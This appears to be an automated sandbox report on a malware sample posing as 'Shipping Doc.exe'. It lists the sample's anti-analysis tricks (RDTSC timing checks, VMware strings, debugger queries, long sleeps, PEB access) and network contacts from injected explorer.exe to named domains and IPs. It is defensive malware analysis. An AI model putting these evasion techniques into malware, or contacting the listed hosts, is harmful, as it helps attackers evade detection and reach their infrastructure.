          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000003209B5E second address: 0000000003209B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 5516Thread sleep time: -39781s >= -30000s
          Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 6132Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3340Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 1392Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 39781
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000006.00000000.280370116.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.273037707.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.280812513.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000006.00000000.311184656.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05413540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0541A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05448DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05461074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05452073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0546740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0546740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0546740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05464015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05464015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05413884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05413884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05394F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05394F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0546070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0546070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0545131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0545138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05465BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05424257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05460EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05460EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05460EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Shipping Doc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.davinescosmetics.com
          Source: C:\Windows\explorer.exeDomain query: www.bigdaddy.fish
          Source: C:\Windows\explorer.exeNetwork Connect: 208.113.204.236 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
